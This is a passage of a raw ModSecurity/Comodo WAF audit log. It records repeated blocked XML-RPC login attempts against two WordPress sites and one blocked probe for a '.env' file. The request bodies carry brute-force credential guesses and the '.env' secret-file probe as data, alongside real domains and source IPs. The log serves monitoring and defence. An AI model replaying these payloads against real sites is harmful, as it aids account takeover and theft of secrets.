[client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116428055992 4591 (- - -) Stopwatch2: 1749116428055992 4591; combined=3608, p1=402, p2=3018, p3=0, p4=0, p5=108, sr=97, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3a7176d-Z-- --8fc7b96e-A-- [05/Jun/2025:16:41:21 +0700] aEFmQX-K7ToMdu-YSIJQ-wAAAAo 103.236.140.4 42406 103.236.140.4 8181 --8fc7b96e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --8fc7b96e-C-- wp.getUsersBlogs wakasarpras Admin123456 --8fc7b96e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8fc7b96e-E-- --8fc7b96e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116481250791 5159 (- - -) Stopwatch2: 1749116481250791 5159; combined=3680, p1=467, p2=3036, p3=0, p4=0, p5=104, sr=92, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8fc7b96e-Z-- --a4b84438-A-- [05/Jun/2025:16:42:21 +0700] aEFmfVwdJdhOudw5hdz4bwAAAJE 103.236.140.4 42576 103.236.140.4 8181 --a4b84438-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a4b84438-C-- wp.getUsersBlogs wakasarpras marketing2022 --a4b84438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4b84438-E-- --a4b84438-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (73+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116541237793 32091 (- - -) Stopwatch2: 1749116541237793 32091; combined=58364, p1=349, p2=2916, p3=0, p4=0, p5=27563, sr=80, sw=80, l=0, gc=27456 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4b84438-Z-- --9c7e317f-A-- [05/Jun/2025:16:42:30 +0700] aEFmhirHpfaS2Cuwh8UDtwAAAEg 103.236.140.4 42616 103.236.140.4 8181 --9c7e317f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9c7e317f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix++ --9c7e317f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c7e317f-E-- --9c7e317f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.69.98.51 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116550820174 4394 (- - -) Stopwatch2: 1749116550820174 4394; combined=3434, p1=394, p2=2853, p3=0, p4=0, p5=107, sr=80, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c7e317f-Z-- --ea30e344-A-- [05/Jun/2025:16:42:43 +0700] aEFmkyrHpfaS2Cuwh8UDuwAAAEs 103.236.140.4 42628 103.236.140.4 8181 --ea30e344-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ea30e344-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@100 --ea30e344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea30e344-E-- --ea30e344-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116563944451 4383 (- - -) Stopwatch2: 1749116563944451 4383; combined=3436, p1=363, p2=2906, p3=0, p4=0, p5=97, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea30e344-Z-- --2a42323b-A-- [05/Jun/2025:16:43:21 +0700] aEFmuSrHpfaS2Cuwh8UD4QAAAEY 103.236.140.4 42712 103.236.140.4 8181 --2a42323b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2a42323b-C-- wp.getUsersBlogs wakasarpras PASS123 --2a42323b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a42323b-E-- --2a42323b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116601043689 4288 (- - -) Stopwatch2: 1749116601043689 4288; combined=3307, p1=349, p2=2790, p3=0, p4=0, p5=98, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a42323b-Z-- --72332112-A-- [05/Jun/2025:16:44:26 +0700] aEFm-irHpfaS2Cuwh8UEGwAAAE0 103.236.140.4 42942 103.236.140.4 8181 --72332112-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --72332112-C-- wp.getUsersBlogs wakasarpras p@ssword --72332112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72332112-E-- --72332112-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (108+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116666218016 4365 (- - -) Stopwatch2: 1749116666218016 4365; combined=3348, p1=385, p2=2795, p3=0, p4=0, p5=98, sr=107, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72332112-Z-- --f8da1a6f-A-- [05/Jun/2025:16:45:26 +0700] aEFnNirHpfaS2Cuwh8UEQQAAAEY 103.236.140.4 43056 103.236.140.4 8181 --f8da1a6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f8da1a6f-C-- wp.getUsersBlogs wakasarpras market --f8da1a6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8da1a6f-E-- --f8da1a6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116726302848 4326 (- - -) Stopwatch2: 1749116726302848 4326; combined=3317, p1=355, p2=2791, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8da1a6f-Z-- --406ddc63-A-- [05/Jun/2025:16:46:26 +0700] aEFncirHpfaS2Cuwh8UEXwAAAFY 103.236.140.4 43176 103.236.140.4 8181 --406ddc63-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --406ddc63-C-- wp.getUsersBlogs wakasarpras 456321 --406ddc63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --406ddc63-E-- --406ddc63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116786118951 4291 (- - -) Stopwatch2: 1749116786118951 4291; combined=3365, p1=363, p2=2838, p3=0, p4=0, p5=95, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --406ddc63-Z-- --c9eb2715-A-- [05/Jun/2025:16:47:26 +0700] aEFnrirHpfaS2Cuwh8UEpgAAAEg 103.236.140.4 43326 103.236.140.4 8181 --c9eb2715-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c9eb2715-C-- wp.getUsersBlogs wakasarpras iloveyou --c9eb2715-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9eb2715-E-- --c9eb2715-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116846357076 4275 (- - -) Stopwatch2: 1749116846357076 4275; combined=3294, p1=368, p2=2757, p3=0, p4=0, p5=99, sr=97, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9eb2715-Z-- --d68b473f-A-- [05/Jun/2025:16:48:09 +0700] aEFn2SrHpfaS2Cuwh8UEuAAAAEA 103.236.140.4 43376 103.236.140.4 8181 --d68b473f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d68b473f-C-- wp.getUsersBlogs wakasarpras 1234%^&* --d68b473f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d68b473f-E-- --d68b473f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116889159665 4360 (- - -) Stopwatch2: 1749116889159665 4360; combined=3319, p1=355, p2=2796, p3=0, p4=0, p5=99, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d68b473f-Z-- --6dd3c17e-A-- [05/Jun/2025:16:48:16 +0700] aEFn4H-K7ToMdu-YSIJRWwAAABc 103.236.140.4 43412 103.236.140.4 8181 --6dd3c17e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6dd3c17e-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh1967 --6dd3c17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dd3c17e-E-- --6dd3c17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749116896484433 4722 (- - -) Stopwatch2: 1749116896484433 4722; combined=3568, p1=362, p2=3017, p3=0, p4=0, p5=112, sr=78, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dd3c17e-Z-- --1ee99d2f-A-- [05/Jun/2025:16:48:20 +0700] aEFn5H-K7ToMdu-YSIJRZAAAAAs 103.236.140.4 43432 103.236.140.4 8181 --1ee99d2f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre Accept-Charset: utf-8 --1ee99d2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ee99d2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749116900069444 695 (- - -) Stopwatch2: 1749116900069444 695; combined=279, p1=243, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ee99d2f-Z-- --a07f4f57-A-- [05/Jun/2025:16:48:26 +0700] aEFn6n-K7ToMdu-YSIJRbAAAABI 103.236.140.4 43456 103.236.140.4 8181 --a07f4f57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a07f4f57-C-- wp.getUsersBlogs wakasarpras !@#123 --a07f4f57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a07f4f57-E-- --a07f4f57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116906001671 4135 (- - -) Stopwatch2: 1749116906001671 4135; combined=3208, p1=338, p2=2707, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a07f4f57-Z-- --b15acc23-A-- [05/Jun/2025:16:49:27 +0700] aEFoJ-th7G2xELALzPZTsAAAAMk 103.236.140.4 43794 103.236.140.4 8181 --b15acc23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b15acc23-C-- wp.getUsersBlogs wakasarpras jordan --b15acc23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b15acc23-E-- --b15acc23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749116967452158 4245 (- - -) Stopwatch2: 1749116967452158 4245; combined=3310, p1=368, p2=2778, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b15acc23-Z-- --52655e66-A-- [05/Jun/2025:16:50:27 +0700] aEFoY-th7G2xELALzPZT5wAAAMs 103.236.140.4 43928 103.236.140.4 8181 --52655e66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --52655e66-C-- wp.getUsersBlogs wakasarpras 147258369 --52655e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52655e66-E-- --52655e66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749117027231279 4701 (- - -) Stopwatch2: 1749117027231279 4701; combined=3371, p1=413, p2=2802, p3=0, p4=0, p5=92, sr=83, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52655e66-Z-- --956f6320-A-- [05/Jun/2025:16:50:49 +0700] aEFoeeth7G2xELALzPZUBQAAANg 103.236.140.4 44014 103.236.140.4 8181 --956f6320-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --956f6320-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh11111 --956f6320-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --956f6320-E-- --956f6320-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified 